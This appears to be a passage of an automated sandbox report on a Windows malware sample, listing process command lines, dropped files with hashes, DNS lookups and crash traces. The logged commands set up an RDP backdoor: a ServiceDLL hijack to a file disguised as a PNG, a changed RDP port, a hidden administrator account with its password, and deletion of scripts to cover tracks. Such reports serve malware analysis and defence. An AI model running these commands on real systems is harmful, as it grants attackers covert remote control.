"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc Ghasar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc B067akwa /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc B067akwa /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc B067akwa /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SCFGBRBT$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc B067akwa

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc B067akwa

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc B067akwa

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 dfsrakizimoy34ggf.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\blowfish.dll

MD5 5afd4a9b7e69e7c6e312b2ce4040394a
SHA1 fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512 f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

\Users\Admin\AppData\Local\Temp\nsd7DE.tmp\nsUnzip.dll

MD5 77a26c23948070dc012bba65e7f390aa
SHA1 7e112775770f9b3b24e2a238b5f7c66f8802e5d8
SHA256 4e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43
SHA512 2e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065

memory/1780-43-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1780-45-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-44-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1780-46-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-47-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-48-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-49-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-50-0x00000000028B0000-0x0000000002930000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\evil.ps1

MD5 71378b4f0b781d534492988926cfb758
SHA1 db6c0e67a5b9a2932f071ee9e165658aa4950bf6
SHA256 1c88620ce8a15c57b1ca64da67cf995f1a3ce3aeef6087d90f6cff772fbf2614
SHA512 62f2475e7284ac7bf480edf5e60d6438e4aa4a8666a0d15694ba2e7ce7fb77629baed27c076f92720373251d97c6501a5ce21c91c7f0040d5fd4dfe92a9c45f4

memory/1780-54-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

memory/1780-53-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1780-69-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-70-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1780-71-0x00000000028B0000-0x0000000002930000-memory.dmp

\Windows\Branding\mediasrv.png

MD5 34c833d9f05fa3ff36ad6256164f8510
SHA1 7f50ab402b023f751af95869d1c7789c864f77fb
SHA256 af2f4f3f3a34bfe56243b2419d0d494c48fbb38502395fc9a726f27737e6a178
SHA512 284edfce8fc6b9bfbe74b770492f8a592a284851d8fa59044147eea80aaaec35f29a4c90a39a1bca89e59f46bd943483b64eedd843a9e23533c82cd768205b93

\Windows\Branding\mediasvc.png

MD5 d81ea89ae878fcfc33accae038a14016
SHA1 aafe059a73426ac3878724c9e713d58e8162ad3d
SHA256 978726f716f0b882d237e7120e0d6ae5ec69f0999e4dd5a5f24f152858d2ac00
SHA512 1568370943476b1bb1a45eb8631156bc53c973d77de2e560b1f66dd9223631d9504e6869e4311967a8aa87900b7bf0b39addc336ec02624403085991cec41d40

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\uninst.dat.log

MD5 0a9acbe50c9af249014e877216e99f4c
SHA1 f79c9d8a1442634f130ffb5359e3502829c5b92f
SHA256 8183b668099930ea6f5bbdba89e67057499a28766cd61cf630642e0dfb4e4047
SHA512 8e79f88ae39e1f741eee33e9c2f0cc595b120a5260ba96790f5a6b90a4ce4dc5ff9e576e56708393c215fdd54964a04ee498795a482194b3c59800ea49925a33

memory/1780-78-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 220

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win7-20240220-en

Max time kernel

140s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 224

Network

N/A

Files

memory/3044-0-0x00000000001C0000-0x00000000001CC000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20231215-en

Max time kernel

93s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4944 -ip 4944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp

Files

N/A